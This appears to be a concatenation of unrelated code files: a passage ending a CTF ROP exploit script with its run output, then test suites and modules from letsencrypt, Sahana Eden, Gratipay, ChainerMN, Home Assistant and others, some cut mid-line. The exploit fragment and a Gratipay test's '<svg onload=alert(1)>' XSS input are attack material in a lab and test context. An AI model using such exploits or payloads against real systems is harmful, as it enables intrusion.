50) # set up the ROP chain in the stack raw_rop = str(rop) for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]): print 'Sending', i io.recvuntil('Choice?\n') io.sendline('2') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 + i io.sendline(str(index)) io.recvuntil('Give me your number:\n') io.sendline(str(address)) # exit to trigger ROP execution io.recvuntil('Choice?\n') io.sendline('3') sleep(0.1) io.send('flag\x00') io.interactive() # $ ./artifact.py REMOTE # [+] Opening connection to 52.192.178.153 on port 31337: Done # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact' # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [+] libc.address: 0x7fed4d6ab000 # [*] Loaded cached gadgets for './libc.so.6' # Sending 0 # Sending 1 # . . . # Sending 30 # Sending 31 # [*] Switching to interactive mode # hitcon{why_libseccomp_cheated_me_Q_Q}
mitnk/letsencrypt
letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
Python
apache-2.0
8,205
0.000122
"""Tests for letsencrypt_apache.parser.""" import os import shutil import unittest import augeas import mock from letsencrypt import errors from letsencrypt_apache.tests import util class BasicParserTest(util.ParserTest): """Apache Parser Test.""" def setUp(self): # pylint: disable=arguments-differ super(BasicParserTest, self).setUp() def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) def test_find_config_root_no_root(self): # pylint: disable=protected-access os.remove(self.parser.loc["root"]) self.assertRaises( errors.NoInstallationError, self.parser._find_config_root) def test_parse_file(self): """Test parse_file. letsencrypt.conf is chosen as the test file as it will not be included during the normal course of execution. """ file_path = os.path.join( self.config_path, "not-parsed-by-default", "letsencrypt.conf") self.parser._parse_file(file_path) # pylint: disable=protected-access # search for the httpd incl matches = self.parser.aug.match( "/augeas/load/Httpd/incl [. ='%s']" % file_path) self.assertTrue(matches) def test_find_dir(self): test = self.parser.find_dir("Listen", "80") # This will only look in enabled hosts test2 = self.parser.find_dir("documentroot") self.assertEqual(len(test), 1) self.assertEqual(len(test2), 4) def test_add_dir(self): aug_default = "/files" + self.parser.loc["default"] self.parser.add_dir(aug_default, "AddDirective", "test") self.assertTrue( self.parser.find_dir("AddDirective", "test", aug_default)) self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"]) matches = self.parser.find_dir("AddList", None, aug_default) for i, match in enumerate(matches): self.assertEqual(self.parser.aug.get(match), str(i + 1)) def test_add_dir_to_ifmodssl(self): """test add_dir_to_ifmodssl. Path must be valid before attempting to add to augeas """ from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123"]) matches = self.parser.find_dir("FakeDirective", "123") self.assertEqual(len(matches), 1) self.assertTrue("IfModule" in matches[0]) def test_add_dir_to_ifmodssl_multiple(self): from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123", "456", "789"]) matches = self.parser.find_dir("FakeDirective") self.assertEqual(len(matches), 3) self.assertTrue("IfModule" in matches[0]) def test_get_aug_path(self): from letsencrypt_apache.parser import get_aug_path self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache")) def test_set_locations(self): with mock.patch("letsencrypt_apache.parser.os.path") as mock_path: mock_path.isfile.side_effect = [False, False] # pylint: disable=protected-access results = self.parser._set_locations() self.assertEqual(results["default"], results["listen"]) self.assertEqual(results["default"], results["name"]) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_variables(self, mock_cfg): mock_cfg.return_value = ( 'ServerRoot: "/etc/apache2"\n' 'Main DocumentRoot: "/var/www"\n' 'Main ErrorLog: "/var/log/apache2/error.log"\n' 'Mutex ssl-stapling: using_defaults\n' 'Mutex ssl-cache: using_defaults\n' 'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n' 'Mutex watchdog-callback: using_defaults\n' 'PidFile: "/var/run/apache2/apache2.pid"\n' 'Define: TEST\n' 'Define: DUMP_RUN_CFG\n' 'Define: U_MICH\n' 'Define: TLS=443\n' 'Define: example_path=Documents/path\n' 'User: name="www-data" id=33 not_used\n' 'Group: name="www-data" id=33 not_used\n' ) expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443", "example_path": "Documents/path"} self.parser.update_runtime_variables() self.assertEqual(self.parser.variables, expected_vars) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_vars_bad_output(self, mock_cfg): mock_cfg.return_value = "Define: TLS=443=24" self.parser.update_runtime_variables() mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24" self.assertRaises( errors.PluginError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.constants.os_constant") @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const): mock_popen.side_effect = OSError mock_const.return_value = "nonexistent" self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_exit(self, mock_popen): mock_popen().communicate.return_value = ("", "") mock_popen.returncode = -1 self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) class ParserInitTest(util.ApacheTest): def setUp(self): # pylint: disable=arguments-differ super(ParserInitTest, self).setUp() self.aug = augeas.Augeas( flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD) def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_unparsable(self, mock_cfg): from letsencrypt_apache.parser import ApacheParser mock_cfg.return_value = ('Define: TEST') self.assertRaises( errors.PluginError, ApacheParser, self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath", version=(2, 2, 22)) def test_root_normalized(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): path = os.path.join( self.temp_dir, "debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2") parser = ApacheParser(self.aug, path, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_absolute(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): parser = ApacheParser( self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_no_trailing_slash(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.A
pacheParser." "update_runtime_variables"): parser = A
pacheParser( self.aug, self.config_path + os.path.sep, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) if __name__ == "__main__": unittest.ma
gnarula/eden_deployment
modules/unit_tests/s3/s3fields.py
Python
mit
47,235
0.001651
# -*- coding: utf-8 -*- # # s3fields unit tests # # To run this script use: # python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3fields.py # import unittest from gluon.languages import lazyT from gluon.dal import Query from s3.s3fields import * # ============================================================================= class S3RepresentTests(unittest.TestCase): # ------------------------------------------------------------------------- def setUp(self): T = current.T self.test_opts = { 1: "Test1", 2: "Test2", 3: "Test3" } current.auth.override = True s3db = current.s3db otable = s3db.org_organisation org1 = Storage(name="Represent Test Organisation1") org1_id = otable.insert(**org1) org1.update(id=org1_id) s3db.update_super(otable, org1) org2 = Storage(name="Represent Test Organisation2") org2_id = otable.insert(**org2) org2.update(id=org2_id) s3db.update_super(otable, org2) self.id1 = org1_id self.id2 = org2_id self.name1 = org1.name self.name2 = org2.name # ------------------------------------------------------------------------- def testSetup(self): """ Check lazy setup method """ # Check for options r = S3Represent(options=self.test_opts) self.assertFalse(r.setup) r._setup() self.assertTrue(r.setup) self.assertEqual(r.tablename, None) self.assertEqual(r.options, self.test_opts) # Check for lookups r = S3Represent(lookup="org_organisation") self.assertFalse(r.setup) self.assertEqual(r.options, None) self.assertEqual(r.tablename, "org_organisation") self.assertEqual(r.key, None) self.assertEqual(r.fields, None) self.assertEqual(r.labels, None) self.assertEqual(r.table, None) r._setup() self.assertTrue(r.setup) self.assertEqual(r.options, None) self.assertEqual(r.tablename, "org_organisation") self.assertEqual(r.key, "id") self.assertEqual(r.fields, ["name"]) self.assertEqual(r.labels, None) self.assertEqual(r.table, current.db.org_organisation) # ------------------------------------------------------------------------- def testOptions(self): """ Test option field representation """ r = S3Represent(options=self.test_opts, none="NONE") # Standard variants self.assertEqual(r(1), "Test1") self.assertEqual(r.multiple([1,2,3]), "Test1, Test2, Test3") self.assertEqual(r.bulk([1,2,3]), { 1: "Test1", 2: "Test2", 3: "Test3", None: "NONE", } ) # list:type r = S3Represent(options=self.test_opts, none="NONE", multiple=True) # Should work with both, single value and list self.assertEqual(r(1), "Test1") self.assertEqual(r([1,2]), "Test1, Test2") # Multiple does always expect list of lists self.assertRaises(ValueError, r.multiple, [1,2,3]) # Check multiple with list:type result = r.multiple([[1,2]]).split(", ") self.assertTrue("Test1" in result) self.assertTrue("Test2" in result) self.assertEqual(len(result), 2) # Check that multiple with list:type de-duplicates properly result = r.multiple([[1,2], [2,3]]).split(", ") self.assertTrue("Test1" in result) self.assertTrue("Test2" in result) self.assertTrue("Test3" in result) self.assertEqual(len(result), 3) # Check bulk with list:type result = r.bulk([[1,2], [2,3]]) self.assertEqual(len(result), 4) self.assertTrue(1 in result) self.assertEqual(result[1], "Test1") self.assertTrue(2 in result) self.assertEqual(result[2], "Test2") self.assertTrue(3 in result) self.assertEqual(result[3], "Test3") self.assertTrue(None in result) self.assertEqual(result[None], "NONE") # ------------------------------------------------------------------------- def testForeignKeys(self): """ Test foreign key lookup representation """ r = S3Represent(lookup="org_organisation") # Check lookup value by value self.assertEqual(r(self.id1), self.name1) self.assertEqual(r(self.id2), self.name2) self.assertEqual(r.queries, 2) # Check lookup of multiple values self.assertEqual(r.multiple([self.id1, self.id2]), "%s, %s" % (self.name1, self.name2)) # Should not have needed any additional queries self.assertEqual(r.queries, 2) # Check bulk lookup result = r.bulk([self.id1, self.id2]) self.assertTrue(len(result), 3) self.assertEqual(result[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) # Should still not have needed any additional queries self.assertEqual(r.queries, 2) # Check that only one query is used for multiple values r = S3Represent(lookup="org_organisation") result = r.bulk([self.id1, self.id2]) self.assertTrue(len(result), 3) self.assertEqual(r.queries, 1) # Check translation r = S3Represent(lookup="org_organisation", translate=True) result = r(self.id1) self.assertTrue(isinstance(result, lazyT)) self.assertEqual(result, current.T(self.name1)) def testRowsPrecedence(self): # Check that rows get preferred over values r = S3Represent(lookup="org_organisation") otable = current.s3db.org_organisation org1 = otable[self.id1] org2 = otable[self.id2] # Test single value self.assertEqual(r(None, row=org1), self.name1) self.assertEqual(r(self.id2, row=org1), self.name1) # Test multiple result = r.multiple(None, rows=[org1, org2]) self.assertTrue(isinstance(result, basestring)) self.assertTrue(", " in result) result = result.split(", ") self.assertEqual(len(result), 2) self.assertTrue(self.name1 in result) self.assertTrue(self.name2 in result) result = r.multiple([self.id1], rows=[org1, org2]) self.assertTrue(isinstance(result, basestring)) self.assertTrue(", " in result) result = result.split(", ") self.assertEqual(len(result), 2) self.assertTrue(self.name1 in result) s
elf.assertTrue(self.name2 in result) # Test bulk result = r.bulk(None, rows=[org1, org2]) self.assertTrue(len(result), 3) self.assertEqual(r
esult[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) result = r.bulk([self.id1], rows=[org1, org2]) self.assertTrue(len(result), 3) self.assertEqual(result[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) # ------------------------------------------------------------------------- def testListReference(self): """ Test Foreign Key Representation in list:reference types """ r = S3Represent(lookup="org_organisation", multiple=True, #linkto=URL(c="org", f="organisation", args=["[id]"]), show_link=True) a = current.request.application # Single value gives a single result result = r(self.id1) self.assertTrue(isinstance(result, DIV)) self.assertEqual(len(result), 1) self.assertTrue(isinstance(result[0], A)) self.assertEqual(result[0].attributes["_href"], "/%s/org/organisation/%s" % (a, self.id1)) self.assertEqual(resu
d0u9/youtube-dl-webui
youtube_dl_webui/__init__.py
Python
gpl-2.0
755
0.005298
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals from argparse import ArgumentParser from .core import Core def getopt
(argv): parser = ArgumentParser(description='Another webui for youtube-dl') parser.add_argument('-c', '--config', metavar="CONFIG_FILE", help="config file") parser.add_argument('--host'
, metavar="ADDR", help="the address server listens on") parser.add_argument('--port', metavar="PORT", help="the port server listens on") return vars(parser.parse_args()) def main(argv=None): from os import getpid print("pid is {}".format(getpid())) print("-----------------------------------") cmd_args = getopt(argv) core = Core(cmd_args=cmd_args) core.start()
okuta/chainer
chainermn/communicators/mpi_communicator_base.py
Python
mit
26,362
0
import mpi4py import numpy import chainer import chainer.backends import chainer.utils from chainer.utils import collections_abc from chainermn.communicators import _communication_utility from chainermn.communicators._communication_utility import chunked_bcast_obj from chainermn.communicators import _memory_utility from chainermn.communicators import communicator_base _dtype_mpi_type = { # see the definition of mpi4py.MPI._typedict (in mpi4py/MPI/typemap.pxi) numpy.dtype(numpy.int32): mpi4py.MPI._typedict['i'], numpy.dtype(numpy.int64): mpi4py.MPI._typedict['l'], numpy.dtype(numpy.float16): mpi4py.MPI._typedict['f'], numpy.dtype(numpy.float32): mpi4py.MPI._typedict['f'], numpy.dtype(numpy.float64): mpi4py.MPI._typedict['d'], } def _check_dtype(caller, msgtype): dtype = msgtype.dtype if dtype not in _dtype_mpi_type.keys(): raise TypeError( '{} does not support dtype {}'.format(caller, dtype)) def _check_dtypes_are_same(msgtypes): dtypes = [msgtype.dtype for msgtype in msgtypes] if any(dtypes[0] != dtype for dtype in dtypes): raise TypeError('all dtypes must be the same') def _is_numpy_array(array): return isinstance(array, numpy.ndarray) def _is_cupy_array(array): return chainer.backend.get_array_module(array) is not numpy def _cnt_to_dsp(cnt): """Utility to convert length array to cumulative array.""" return [0] + numpy.cumsum(cnt)[:-1].tolist() def _get_mpi_type(msgtype): dtype = msgtype.dtype if dtype not in _dtype_mpi_type.keys(): raise TypeError( 'dtype {} is not supported by MpiCommunicator'.format(dtype)) return _dtype_mpi_type[dtype] class _MessageType(object): def __init__(self, obj): if _is_numpy_array(obj) or _is_cupy_array(obj): self.is_host = _is_numpy_array(obj) self.is_tuple = False self.narr = 1 self.ndims = [obj.ndim] self.shapes = [obj.shape] self.dtype = obj.dtype elif isinstance(obj, collections_abc.Iterable): if all(map(_is_numpy_array, obj)): self.is_host = True elif all(map(_is_cupy_array, obj)): self.is_host = False else: raise ValueError( 'All message objects must be either numpy or cupy arrays.') self.is_tuple = True self.narr = len(obj) self.ndims = [x.ndim for x in obj] self.shapes = [x.shape for x in obj] dtypes = [x.dtype for x in obj] if not all(dtype == dtypes[0] for dtype in dtypes): raise TypeError( 'Message objects must be the same dtype') self.dtype = dtypes[0] else: raise TypeError( 'Message object must be numpy/cupy array or its tuple.') def get_array_module(self): if self.is_host: return numpy else: import cupy r
eturn cupy class MpiCommunicatorBase(communicator_base.CommunicatorBase): '''MpiCommunicatorBase Implementation of communicator interface defined by :class:`CommunicatorBase`. This communicator assumes MPI4py and all ChainerMN processes are invoked by ``mpirun`` (``mpiexec``) command. Although this lacks several important methods such as ``multi_node_mean_grad`` to be impelmented with speficic algorithm. See hiera
rcical communicator or pure_nccl communicator for example. ''' def __init__(self, mpi_comm): self.mpi_comm = mpi_comm self._init_ranks() @property def rank(self): return self.mpi_comm.rank @property def size(self): return self.mpi_comm.size @property def intra_rank(self): return self._intra_rank @property def intra_size(self): return self._intra_size @property def inter_rank(self): return self._inter_rank @property def inter_size(self): return self._inter_size def split(self, color, key): return self.__class__(mpi_comm=self.mpi_comm.Split(color, key)) def alltoall(self, xs): """A primitive of inter-process all-to-all function. This method tries to invoke all-to-all communication within the communicator. All processes in the communicator are expected to invoke ``alltoall()``. This method relies on mpi4py fast communication optimized for numpy arrays, as well as ``send()`` and ``recv()``. If ``xs`` is numpy array, the returned array will also be allocated as numpy array. Additionally, when ``xs`` is cupy array, the returned array will be placed at current device (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``) regardless of which device the argument is placed at remote nodes. Args: xs (tuple of numpy/cupy array) Returns: ys (tuple of numpy/cupy array): Received arrays. The length of tuple equals to the communicator size. """ chainer.utils.experimental( 'chainermn.communicators.MpiCommunicatorBase.alltoall') if len(xs) != self.size: raise ValueError( 'The length of data must be same as communicator size.') # Type check. msgtypes = [_MessageType(x) for x in xs] for msgtype in msgtypes: _check_dtype('alltoall', msgtype) _check_dtypes_are_same(msgtypes) send_msgtype = msgtypes[0] msgtypes = self.mpi_comm.alltoall(msgtypes) _check_dtypes_are_same(msgtypes) recv_msgtype = msgtypes[0] # Collective communication. slens = [x.size for x in xs] xp = chainer.backend.get_array_module(*xs) sbuf = xp.hstack([x.reshape(-1) for x in xs]) shapes = [msgtype.shapes[0] for msgtype in msgtypes] rlens = [chainer.utils.size_of_shape(s) for s in shapes] rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype) if xp is not numpy: sbuf = _memory_utility.get_device_memory_pointer(sbuf) chainer.cuda.Stream.null.synchronize() self.mpi_comm.Alltoallv( [sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(send_msgtype)], [_memory_utility.get_device_memory_pointer(rbuf), (rlens, _cnt_to_dsp(rlens)), _get_mpi_type(recv_msgtype)]) ys = [rbuf[i:i + l].reshape(s) for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)] return tuple(ys) def send(self, data, dest, tag): """A primitive for inter-process transmitter. This method sends numpy-array to target process. The target process is expected to invoke ``recv()``. This method relies on mpi4py fast communication optimized for numpy arrays, which discards any information attached to chainer.Variable objects. Please be sure. Args: data: data to be sent (tuple, list or raw numpy/cupy array) dest (int): Target process specifier. tag (int): Message ID (MPI feature). """ chainer.utils.experimental( 'chainermn.communicators.MpiCommunicatorBase.send') msgtype = _MessageType(data) _check_dtype('send', msgtype) """We use ssend() instead of send() to pass unittests. If we don't use it, an error occurs in test_point_to_point_communication.py when using MVAPICH2-2.2 and GPUs. """ self.mpi_comm.ssend(msgtype, dest=dest, tag=tag) # Type check. if not msgtype.is_tuple: data = [data] for array in data: if numpy.float16 == array.dtype: array = array.astype(numpy.float32) if chainer.backend.get_array_module(array) is not numpy: chainer.cuda.Stream.null.synchronize() array = (_memory_utility.get_device_memory_pointer(array), _get_mpi_type(msgtype)) else:
gratipay/gratipay.com
tests/py/test_security.py
Python
mit
5,176
0.002705
from __future__ import absolute_import, division, print_function, unicode_literals import struct import datetime from aspen import Response from aspen.http.request import Request from base64 import urlsafe_b64decode from cryptography.fernet import Fernet, InvalidToken from gratipay import security from gratipay.models.participant import Identity from gratipay.security.crypto import EncryptingPacker from gratipay.testing import Harness from pytest import raises class RejectNullBytesInURI(Harness): def test_filters_path(self): assert self.client.GxT('/f%00/').code == 400 def test_filters_querystring(self): assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400 def test_protects_against_reflected_xss(self): self.make_package() assert self.client.GET('/on/npm/foo').code == 200 assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400 assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi class OnlyAllowCertainMethodsTests(Harness): def test_is_installed_properly(self): assert self.client.hxt('TRaCE', '/').code == 405 def test_allows_certain_methods(self): for allowed in ('GEt', 'HEaD', 'PosT'): request = Request(allowed) assert security.only_allow_certain_methods(request) is None def test_disallows_a_bunch_of_other_stuff(self): for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'): request = Request(disallowed) response = raises(Response, security.only_allow_certain_methods, request).value assert response.code == 405 def test_doesnt_choke_error_handling(self): assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405 def test_prevents_csrf_from_choking(self): assert self.client.PxST('/assets/gratipay.css').code == 405 class AddHeadersToResponseTests(Harness): def test_sets_x_frame_options(self): headers = self.client.GET('/about/').headers assert headers['X-Frame-Options'] == 'SAMEORIGIN' def test_sets_x_content_type_options(self): headers = self.client.GET('/about/').headers assert headers['X-Content-Type-Options'] == 'nosniff' def test_sets_x_xss_protection(self): headers = self.client.GET('/about/').headers assert headers['X-XSS-Protection'] == '1; mode=block' def test_sets_referrer_policy(self): headers = self.client.GET('/about/').headers assert headers['Referrer-Policy'] == \ 'no-referrer-when-downgrade, strict-origin-when-cross-origin
' def test_sets_strict_transport_security(self): headers = self.client.GET('/about/').headers assert headers['strict-transport-security'] == 'max-age=31536000
' def test_doesnt_set_content_security_policy_by_default(self): assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers def test_sets_content_security_policy(self): with self.setenv(CSP_REPORT_URI='http://cheese/'): headers = self.client.GET('/about/').headers policy = ( "default-src 'self';" "script-src 'self' assets.gratipay.com 'unsafe-inline';" "style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com" " 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';" "img-src *;" "font-src 'self' assets.gratipay.com cloud.typography.com data:;" "block-all-mixed-content;" "report-uri http://cheese/;" ) assert headers['content-security-policy-report-only'] == policy class EncryptingPackerTests(Harness): packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\ b'5TdyoJsll5nMAicg==' def test_packs_encryptingly(self): packed = Identity.encrypting_packer.pack({"foo": "bar"}) assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version def test_unpacks_decryptingly(self): assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_fails_to_unpack_old_data_with_a_new_key(self): encrypting_packer = EncryptingPacker(Fernet.generate_key()) raises(InvalidToken, encrypting_packer.unpack, self.packed) def test_can_unpack_if_old_key_is_provided(self): old_key = str(self.client.website.env.crypto_keys) encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key) assert encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_leaks_timestamp_derp(self): # https://github.com/pyca/cryptography/issues/2714 timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted! assert datetime.datetime.fromtimestamp(timestamp).year == 2016 def test_demands_bytes(self): raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer')) raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
echopen/PRJ-medtec_sigproc
echopen-leaderboard/bootcamp/leaderboard/urls.py
Python
mit
466
0
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.shortcuts import render from django.conf.urls i
mport url from .views import HomePageView, LeaderboardView, MiscView, Sign_upView urlpatterns = [ url(r'^$', HomePageView.as_view(), name='home'), url(r'^misc$', Mi
scView.as_view(), name='misc'), url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'), url(r'^login$', Sign_upView.as_view(), name='login'), ]
zlatozar/pytak
pytak/tests/call_test.py
Python
bsd-3-clause
2,316
0.018566
# -*- coding: utf-8 -*- from __future__ import print_function import pytak.call as call import pytak.runners.tools as tools from fakeapi import
CreateTag from fakeapi import GetInformationAboutYourself from fakeapi import CreateAPost new_request_body = { "title" : "New Employee [XXXXX]", "body" : "Please welcome our new employee. Pytak tag - [DDDD]", "type" : "TEXT", "permissions" : { "principal" : { "id" : "12345", "resource" : "http://example.com/schema/1.0/user" }, "permissionFlags" : { "view" : "true", "edit"
: "false", "comment" : "true", "share" : "true", "authorize" :"false" } }, "tags" : [ {"name" : "tag2" }, { "name" : "tag3" }, { "name" : "tag4" } ] } def test_randomize_text(): txt = "JSON value with [XXXX] and [DDDD]" assert txt != call.randomize_text(txt) def test_random_int_leght(): dig = call.__get_random_int(4) assert len(str(dig)) == 4 def test_random_alphanum_leght(): alphnum = call.__get_random_alphanumeric(4) assert len(alphnum) == 4 def test_api_object_request_body_creation(): ct = CreateTag() ct2 = CreateTag(assign={'name':'first'}) assert ct.request_body == ct2.request_body def test_api_object_request_body_manipulation_with_empty(): ct = CreateTag() ct2 = CreateTag(assign={'name':'second'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_api_object_request_body_manipulation_with_change(): ct = CreateTag(assign={'name':'one'}) ct2 = CreateTag(assign={'name':'two'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_url_rewrite(): your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName" assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName" def test_request_body_rewrite(): CreateAPost() << new_request_body def test_assign_randomization(): create_tag = CreateTag(assign={"name" : "pytak-[XXXX]"}) assert create_tag.assign != {"name" : "pytak-[XXXX]"} def test_request_body_randomization(): create_post = CreateAPost() << new_request_body print(create_post.request_body)
rx2130/Leetcode
python/220 Contains Duplicate III.py
Python
apache-2.0
777
0.001287
class Solution(object): def containsNearbyAlmostDuplicate(self, nums, k, t): """ :type nums: List[int] :type k: int :type t: int :rtype: bool """ if k < 1 or t < 0: return False dic = {} t += 1 for i in range(len(nums)): if i > k: del dic[nums[i - k - 1] // t] m = nums[i] // t if m in dic: return True if m - 1 in dic and abs(nums[i] - dic[m - 1])
< t: return True if m + 1 in dic and abs(nums[i] - dic[m
+ 1]) < t: return True dic[m] = nums[i] return False test = Solution() print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))
leppa/home-assistant
homeassistant/components/wirelesstag/__init__.py
Python
apache-2.0
9,650
0.000415
"""Support for Wireless Sensor Tags.""" import logging from requests.exceptions import ConnectTimeout, HTTPError import voluptuous as vol from wirelesstagpy import NotificationConfig as NC from homeassistant import util from homeassistant.const import ( ATTR_BATTERY_LEVEL, ATTR_VOLTAGE, CONF_PASSWORD, CONF_USERNAME, ) import homeassistant.helpers.config_validation as cv from homeassistant.helpers.dispatcher import dispatcher_send from homeassistant.helpers.entity import Entity _LOGGER = logging.getLogger(__name__) # Strength of signal in dBm ATTR_TAG_SIGNAL_STRENGTH = "signal_strength" # Indicates if tag is out of range or not ATTR_TAG_OUT_OF_RANGE = "out_of_range" # Number in percents from max power of tag receiver ATTR_TAG_POWER_CONSUMPTION = "power_consumption" NOTIFICATION_ID = "wirelesstag_notification" NOTIFICATION_TITLE = "Wireless Sensor Tag Setup" DOMAIN = "wirelesstag" DEFAULT_ENTITY_NAMESPACE = "wirelesstag" # Template for signal - first parameter is tag_id, # second, tag manager mac address SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}" # Template for signal - tag_id, sensor type and # tag manager mac address SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) }, extra=vol.ALLOW_EXTRA, ) class WirelessTagPlatform: """Principal object to manage all registered in HA tags.""" def __init__(self, hass, api): """Designated initializer for wirelesstags platform.""" self.hass = hass self.api = api self.tags = {} self._local_base_url = None @property def tag_manager_macs(self): """Return list of tag managers mac addresses in user account.""" return self.api.mac_addresses def load_tags(self): """Load tags from remote server.""" self.tags = self.api.load_tags() return self.tags def arm(self, switch): """Arm entity sensor monitoring.""" func_name = f"arm_{switch.sensor_type}" arm_func = getattr(self.api, func_name) if arm_func is not None: arm_func(switch.tag_id, switch.tag_manager_mac) def disarm(self, switch): """Disarm entity sensor monitoring.""" func_name = f"disarm_{switch.sensor_type}" disarm_func = getattr(self.api, func_name) if disarm_func is not None: disarm_func(switch.tag_id, switch.tag_manager_mac) def make_notifications(self, binary_sensors, mac): """Create configurations for push notifications.""" _LOGGER.info("Creating configurations for push notifications.") configs = [] bi_url = self.binary_event_callback_url for bi_sensor in binary_sensors: configs.extend(bi_sensor.event.build_notifications(bi_url, mac)) update_url = self.update_callback_url update_config = NC.make_config_for_update_event(update_url, mac) configs.append(update_config) return configs def install_push_notifications(self, binary_sensors): """Register local push notification from
tag manager.""" _LOGGER.info("Registering local push notifications.") for mac in self.tag_manager_macs: configs = self.make_notifications(binary_sensors, mac) # install notifications for all tags in tag manager # specified by mac result = self.api.inst
all_push_notification(0, configs, True, mac) if not result: self.hass.components.persistent_notification.create( "Error: failed to install local push notifications <br />", title="Wireless Sensor Tag Setup Local Push Notifications", notification_id="wirelesstag_failed_push_notification", ) else: _LOGGER.info( "Installed push notifications for all\ tags in %s.", mac, ) @property def local_base_url(self): """Define base url of hass in local network.""" if self._local_base_url is None: self._local_base_url = "http://{}".format(util.get_local_ip()) port = self.hass.config.api.port if port is not None: self._local_base_url += f":{port}" return self._local_base_url @property def update_callback_url(self): """Return url for local push notifications(update event).""" return f"{self.local_base_url}/api/events/wirelesstag_update_tags" @property def binary_event_callback_url(self): """Return url for local push notifications(binary event).""" return f"{self.local_base_url}/api/events/wirelesstag_binary_event" def handle_update_tags_event(self, event): """Handle push event from wireless tag manager.""" _LOGGER.info("push notification for update arrived: %s", event) try: tag_id = event.data.get("id") mac = event.data.get("mac") dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event) except Exception as ex: # pylint: 